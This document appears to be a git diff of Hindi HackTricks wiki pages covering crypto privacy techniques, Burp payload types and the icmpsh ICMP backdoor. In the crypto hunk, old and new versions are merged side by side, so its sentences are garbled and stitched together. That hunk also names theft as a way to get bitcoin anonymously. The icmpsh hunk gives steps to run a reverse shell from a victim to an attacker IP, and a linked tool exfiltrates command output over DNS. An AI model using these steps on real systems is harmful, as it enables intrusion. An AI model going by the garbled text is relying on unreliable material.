* **खनन:** खनन बिटकॉइन प्राप्त करने का सबसे गुमनाम तरीका है। यह सोलो-खनन के लिए लागू है क्योंकि [खनन पूल](https://en.bitcoin.it/wiki/Pooled\_mining) आम तौर पर हैशर का IP पता जानते हैं।
* **चोरी:** सिद्धांत में एक और गुमनाम तरीका बिटकॉइन प्राप्त करने का यह है कि उन्हें चुराया जाए।
## मिक्सर
एक उपयोगकर्ता **मिक्सिंग सेवा को बिटकॉइन भेजेगा** और सेवा **उपयोगकर्ता को विभिन्न बिटकॉइन वापस भेजेगी**, एक शुल्क कम करके। सिद्धांत में, ब्लॉकचेन को अवलोकन करने वाला दुश्मन **आने वाले और जाने वाले लेन-देन को जोड़ने में असमर्थ होगा**
हालांकि, उपयोगकर्ता को मिक्सिंग सेवा पर भरोसा करना होगा कि वह बिटकॉइन वापस करेगी और यह भी नहीं रिकॉर्ड सहेज रही है कि पैसे प्राप्त और भेजे गए धन के बीच संबंधों के बारे में।\
कुछ अन्य सेवाएं भी मिक्सर के रूप में उपयोग की जा सकती हैं, जैसे बिटकॉइन कैसीनो जहां आप बिटकॉइन भेज सकते हैं और बाद में उन्हें पुनः प्राप्त कर सकते हैं।
## कॉइनजॉइन
**कॉइनजॉइन** एक उपयोगकर्ताओं के कई लेन-देन को केवल एक में मिलाएगा ताकि एक अवलोकक को पता लगाना अधिक **कठिन** हो जिस इनपुट किस आउटपुट से संबंधित है।\
यह एक नई स्तर की गोपनीयता प्रदान करता है, हालांकि, **कुछ** **लेन-देन** जहां कुछ इनपुट और आउटपुट राशियाँ संबंधित हैं या बाकी इनपुट और आउटपुट से बहुत अलग हैं **बाहरी अवलोकक द्वारा संबंधित हो सकते हैं**
बिटकॉइन की ब्लॉकचेन पर (संभावित) कॉइनजॉइन लेन-देन आईडी के उदाहरण हैं `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` और `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`
[**https://coinjoin.io/en**](https://coinjoin.io/en)\
**कॉइनजॉइन के लिए समान लेकिन बेहतर और एथीरियम के लिए आपके पास** [**ट
```
2 btc --> 3 btc 2 btc --> 3 btc
5 btc 4 btc 5 btc 4 btc
``` ```
# बिटकॉइन गोपनीयता अच्छी प्रथाएं Transactions जैसे ऊपर किये गए PayJoin हो सकते हैं, जो मानक बिटकॉइन लेन-देन से अलग होते हुए गोपनीयता को बढ़ा सकते हैं।
## वॉलेट समक्रमण **PayJoin का उपयोग पारंपरिक निगरानी विधियों को काफी व्यवधान कर सकता है**, जिससे लेन-देनीय गोपनीयता की पुरस्कृति में एक आशाजनक विकास हो सकता है।
बिटकॉइन वॉलेट को अपने शेष और इतिहास के बारे में जानकारी कैसे प्राप्त करनी चाहिए। देर से 2018 के अनुसार सबसे व्यावहारिक और निजी मौजूदा समाधान हैं एक **पूर्ण नोड वॉलेट** (जो अधिकतम निजी है) और **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग** (जो बहुत अच्छा है)। # क्रिप्टोकरेंसी में गोपनीयता के लिए सर्वोत्तम अभ्यास
* **पूर्ण नोड:** पूर्ण नोड पूरे ब्लॉकचेन को डाउनलोड करते हैं जिसमें बिटकॉइन में हुए हर ऑन-चेन [लेन-देन](https://en.bitcoin.it/wiki/Transaction) शामिल है। इसलिए एक प्रतिकूल उपयोगकर्ता की इंटरनेट कनेक्शन को देख रहे शत्रु को यह पता नहीं चलेगा कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है। ## **वॉलेट समक्रमण तकनीकें**
* **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग:** क्लाइंट-साइड ब्लॉक फ़िल्टरिंग काम करता है जिसमें **फ़िल्टर** बनाए जाते हैं जो ब्लॉक में हर लेन-देन के सभी **पते** को शामिल करते हैं। फ़िल्टर यह जांच सकते हैं कि क्या कोई **तत्व सेट में है**; गलत पॉजिटिव्स संभव हैं लेकिन गलत नेगेटिव्स नहीं। एक हल्का वॉलेट सभी ब्लॉक में अपने **पतों** के साथ मेल खाता है और इसके **पास** **पते** के मिलान की जांच करता है। मिलान वाले निर्देशिका से वह ब्लॉक पूरे डाउनलोड करेगा, और उन ब्लॉक का उपयोग वॉलेट के इतिहास और वर्तमान शेष को प्राप्त करने के लिए किया जाएगा।
## टॉर गोपनीयता और सुरक्षा बनाए रखने के लिए वॉलेट को ब्लॉकचेन के साथ समक्रमित करना महत्वपूर्ण है। दो तकनीकों में उत्कृष्टता है:
बिटकॉइन नेटवर्क एक पीर-टू-पीर नेटवर्क का उपयोग करता है, जिसका मतलब है कि अन्य पीयर आपका आईपी पता सीख सकते हैं। इसलिए यह सिफारिश की जाती है कि आप **बिटकॉइन नेटवर्क के साथ संवाद करना चाहते हैं तो हर बार टॉर के माध्यम से कनेक्ट करें** - **पूर्ण नोड**: पूर्ण नोड द्वारा पूरे ब्लॉकचेन को डाउनलोड करके, एक पूर्ण नोड गोपनीयता को अधिकतम सुनिश्चित करता है। सभी किए गए लेन-देन स्थानीय रूप से संग्रहीत होते हैं, जिससे प्रतिकूलकों को पहचानना असंभव हो जाता है कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है।
- **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग**: यह तकनीक ब्लॉकचेन में हर ब्लॉक के लिए फ़िल्टर बनाने को शामिल है, जिससे वॉलेट नेटवर्क अवलोककर्ताओं को विशेष रुचियों को प्रकट किए बिना संबोधित लेन-देन की पहचान कर सकते हैं। हल्के वॉलेट इन फ़िल्टर्स को डाउनलोड करते हैं, केवल जब उपयोगकर्ता के पतों के साथ मेल खाता है तो पूरे ब्लॉक्स को लाते हैं।
## पते का पुनः उपयोग न करना ## **गोपनीयता के लिए Tor का उपयोग**
**पतों का अधिक से अधिक एक बार से अधिक उपयोग करना गोपनीयता के लिए बहुत हानिकारक है क्योंकि यह अधिक ब्लॉकचेन लेन-देन को जोड़ता है जिसमें यह साबित होता है कि वे एक ही एकाइ द्वारा बनाए गए थे**। बिटकॉइन का सबसे निजी और सुरक्षित तरीका यह है कि जो व्यक्ति आपको भुगतान करता है, उसे प्रत्येक व्यक्ति को एक नया पता भेजा जाए। प्राप्त किए गए सिक्के खर्च कर दिए जाने के बाद पता कभी भी फिर से उपयोग नहीं किया जाना चाहिए। साथ ही, जब बिटकॉइन भेजा जाए तो एक नया बिटकॉइन पता मांगा जाना चाहिए। सभी अच्छे बिटकॉइन वॉलेट में उपयोगकर्ता इंटरफेस होता है जो पते का पुनः उपयोग न करने की सलाह देता है बिटकॉइन पीयर-टू-पीयर नेटवर्क पर काम करते हुए, Tor का उपयोग आपके आईपी पते को मास्क करने के लिए सिफारिश किया जाता है, जिससे नेटवर्क के साथ बातचीत करते समय गोपनीयता में वृद्धि हो।
## एकाधिक लेन-देन ## **पते के पुनः उपयोग से बचाव**
**किसी को एक से अधिक ऑन-चेन लेन-देन के माध्यम से भुगतान करना राशि-आधारित गोपनीयता हमलों की शक्ति को बहुत कम कर सकता है जैसे कि राशि संबंध और गोल नंबर**। उदाहरण के लिए, यदि उपयोगकर्ता किसी को 5 BTC भुगतान करना चाहता है और उन्हें चाहिए कि 5 BTC मूल्य आसानी से खोजा न जा सके, तो वे 2 BTC और 3 BTC के मूल्य के लिए दो लेन-देन भेज सकते हैं जो मिलाकर 5 BTC के बराबर होते हैं। गोपनीयता की रक्षा के लिए, प्रत्येक लेन-देन के लिए एक नया पता उपयोग करना महत्वपूर्ण है। पतों का पुनः उपयोग गोपनीयता को खतरे में डाल सकता है क्योंकि यह लेन-देन को एक ही एकता से जोड़ सकता है। आधुनिक वॉलेट अपने डिज़ाइन के माध्यम से पते के पुनः उपयोग को निषेधित करते हैं।
## बदला टालना ## **लेन-देन गोपनीयता के लिए रणनीतियाँ**
बदला टालना एक ऐसी स्थिति है जहाँ लेन-देन के इनपुट और आउटपुट को ध्यान से चुना जाता है ताकि किसी भी बदला आउटपुट की आवश्यकता न हो। **किसी भी बदला आउटपुट का न होना गोपनीयता के लिए उत्कृष्ट है**, क्योंकि यह बदला पता लगाने के नियमों को तोड़ता है। - **एकाधिक लेन-देन**: भुगतान को कई लेन-देन में विभाजित करना लेन-देन राशि को अस्पष्ट कर सकता है, गोपनीयता हमलों को नाकाम बना सकता है।
- **बदलाव टालना**: बदलाव की आवश्यकता न होने पर, बदलाव उत्पादन के लिए लेन-देन का चयन करना गोपनीयता को बढ़ा सकता है जिससे बदलाव की पहचान की विधियों को विघटित किया जा सकता है।
- **एकाधिक बदलाव उत्पादन**: यदि बदलाव टालना संभव नहीं है, तो एकाधिक बदलाव उत्पादन भी गोपनीयता में सुधार कर सकता है।
## एकाधिक बदला आउटपुट # **Monero: एक गोपनीयता का प्रकाश**
यदि बदला टालना एक विकल्प नहीं है तो **एक से अधिक बदला आउटपुट बनाने से गोपनीयता में सुधार हो सकता है**। यह भी बदला पता लगाने के नियमों को तोड़ता है जो सामान्यत: केवल एकल बदला आउटपुट होने का अनुमान करते हैं। जैसा कि यह विधि सामान्य से अधिक ब्लॉक स्थान का उपयोग करती है, बदला टालना अधिक अच्छा है। Monero डिजिटल लेन-देन में पूर्ण गोपनीयता की आवश्यकता को संबोधित करता है, गोपनीयता के लिए एक उच्च मानक स्थापित करता है।
# मोनेरो # **Ethereum: गैस और लेन-देन**
जब मोनेरो विकसित किया गया था, तो पूरी गोपनीयता की आवश्यकता थी जिसे यह हल करने का प्रयास किया गया था, और बड़े हिस्से में, यह उस शून्यता को भर दिया है। ## **गैस को समझना**
# इथेरियम गैस एथेरियम पर ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणना प्रयास को मापता है, **ग्वेई** में मूल्यांकन किया जाता है। उदाहरण के लिए, 2,310,000 ग्वेई (या 0.00231 ईथ) का लेन-देन एक गैस सीमा और एक मूल शुल्क के साथ होता है, जिसमें खान में प्रेरित करने के लिए एक टिप शामिल है। उपयोगकर्ता अधिक भुगतान न करें, इसके अतिरिक्त रिफंड किया जाता है।
## गैस ## **लेन-देन कार्यान्वित करना**
गैस उनिट को सूचित करता है जो इथेरियम नेटवर्क पर विशेष ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणनात्मक प्रयास की मात्रा को मापता है। गैस इथेरियम पर एक लेन-देन सफलतापूर्वक करने के लिए आवश्यक शुल्क को सूचित करता है एथेरियम में लेन-देन एक भेजने वाले और प्राप्तकर्ता के बीच होते हैं, जो या तो उपयोगकर्ता हो सकते हैं या स्मार्ट कॉन्ट्रैक्ट पते हो सकते हैं। इन्हें एक शुल्क की आवश्यकता होती है और उन्हें खनन किया जाना चाहिए। लेन-देन में महत्वपूर्ण जानकारी में प्राप्तकर्ता, भेजने वाले के हस्ताक्षर, मूल्य, वैकल्पिक डेटा, गैस सीमा, और शुल्क शामिल हैं। विशेष रूप से, भेजने वाले का पता हस्ताक्षर से निकाला जाता है, जिससे लेन-देन डेटा में इसकी आवश्यकता नहीं होती
गैस मूल्य को **ग्वेई** में दर्शाया जाता है, जो खुद इथ का एक मापन है - प्रत्येक ग्वेई 0.000000001 इथ (10-9 इथ) के बराबर है। उदाहरण के लिए, यदि आपका गैस 0.000000001 इथ है, तो आप कह सकते हैं कि आपका गैस 1 ग्वेई का है। 'ग्वेई' शब्द खुद में 'गिगा-वेई' का अर्थ है, और यह 1,000,000,000 वेई के बराबर है। वेई खुद इथ की **सबसे छोटी इकाई** है ये अभ्यास और तंत्र उन सभी लोगों के लिए मौलिक हैं जो क्रिप्टोकरेंसी के साथ संलग्न होने की दृष्टि से गोपनीयता और सुरक्षा को प्राथमिकता देते हैं
एक लेन-देन की गैस की गणना करने के लिए इस उदाहरण को पढ़ें: ## संदर्भ
मान लें कि जॉर्डन को टेलर को 1 इथ देना है। लेन-देन में गैस सीमा 21,000 इकाइयाँ हैं और बेस शुल्क 100 ग्वेई है। जॉर्डन ने 10 ग्वेई की टिप शामिल की है। * [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
ऊपर दिए गए सूत्र का उपयोग करके हम इसे गणना कर सकते हैं `21,000 * (100 + 10) = 2,310,000 ग्वेई` या 0.00231 इथ। * [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions)
* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
जब जॉर्डन पैसे भेजता है, तो 1.00231 इथ जॉर्डन के खाते से कटा जाएगा। टेलर को 1.0000 इथ क्रेडिट किया जाएगा। खननकर्ता को 0.00021 इथ की टिप मिलेगी। 0.0021 इथ का बेस शुल्क जला दिया जाएगा। * [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
इसके अतिरिक्त, जॉर्डन लेन-देन के लिए एक अधिकतम शुल्क (`maxFeePer

View file

@ -1,43 +1,45 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details> </details>
{% endhint %}
# मूल Payloads # मूल पेलोड
* **सरल सूची:** बस एक सूची जिसमें प्रत्येक पंक्ति में एक प्रविष्टि होती है * **सरल सूची:** हर पंक्ति में एक प्रविष्टि वाली सूची
* **रनटाइम फ़ाइल:** एक सूची जो रनटाइम में पढ़ी जाती है (मेमोरी में लोड नहीं होती)। बड़ी सूचियों का समर्थन करने के लिए। * **रनटाइम फ़ाइल:** रनटाइम में पढ़ी गई सूची (मेमोरी में लोड नहीं की गई)। बड़ी सूचियों का समर्थन करने के लिए।
* **केस मॉडिफिकेशन:** स्ट्रिंग्स की एक सूची में कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचले केस में, ऊपरी केस में, प्रॉपर नाम - पहला अक्षर बड़ा और बाकी निचले केस में-, प्रॉपर नाम -पहला अक्षर बड़ा और बाकी वैसे ही रहते हैं-। * **केस संशोधन:** स्ट्रिंग की सूची पर कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचे, ऊपर, सही नाम - पहले बड़ा अक्षर और बाकी को छोटा करें-, सही नाम - पहले बड़ा अक्षर और बाकी वैसा ही रहेगा-।
* **संख्याएँ:** X से Y तक Z कदम या यादृच्छिक रूप से संख्याएँ उत्पन्न करें * **नंबर्स:** X से Y तक नंबर उत्पन्न करें Z कदम या यादृच्छिक रूप से।
* **ब्रूट फोर्सर:** अक्षर सेट, न्यूनतम और अधिकतम लंबाई। * **ब्रूट फोर्सर:** वर्ण सेट, न्यूनतम और अधिकतम लंबाई।
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : DNS अनुरोधों के माध्यम से कमांड्स को निष्पादित करने और आउटपुट प्राप्त करने के लिए Payload [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : कमांड निष्पादित करने और आउटपुट को बर्पकोलब के माध्यम से DNS अनुरोधों के माध्यम से पकड़ने के लिए पेलोड
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} {% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details> </details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
बैकडोर डाउनलोड करें: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) बैकडोर डाउनलोड करें: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
@ -19,7 +20,7 @@ HackTricks का समर्थन करने के अन्य तरी
स्क्रिप्ट को निष्पादित करें: **run.sh** स्क्रिप्ट को निष्पादित करें: **run.sh**
**यदि आपको कोई त्रुटि मिलती है, तो पंक्तियों को बदलने का प्रयास करें:** **अगर आपको कोई त्रुटि मिलती है, तो पंक्तियों को बदलने का प्रयास करें:**
```bash ```bash
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1) IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
@ -29,22 +30,23 @@ IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
echo Please insert the IP where you want to listen echo Please insert the IP where you want to listen
read IP read IP
``` ```
# **शिकारक दल** # **शिकारी पक्ष**
**icmpsh.exe** को शिकारक के पास अपलोड करें और क्रियान्वित करें: शिकारी पक्ष पर **icmpsh.exe** अपलोड करें और क्रियान्वित करें:
```bash ```bash
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128 icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
``` ```
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com)
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,150 +1,143 @@
{% hint style="success" %}
सीखें और प्रैक्टिस AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापन दिखाए जाए** या **HackTricks को PDF में डाउनलोड** करें तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PRs सबमिट करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
# मूलभूत शब्दावली ## मूल अवधारणाएँ
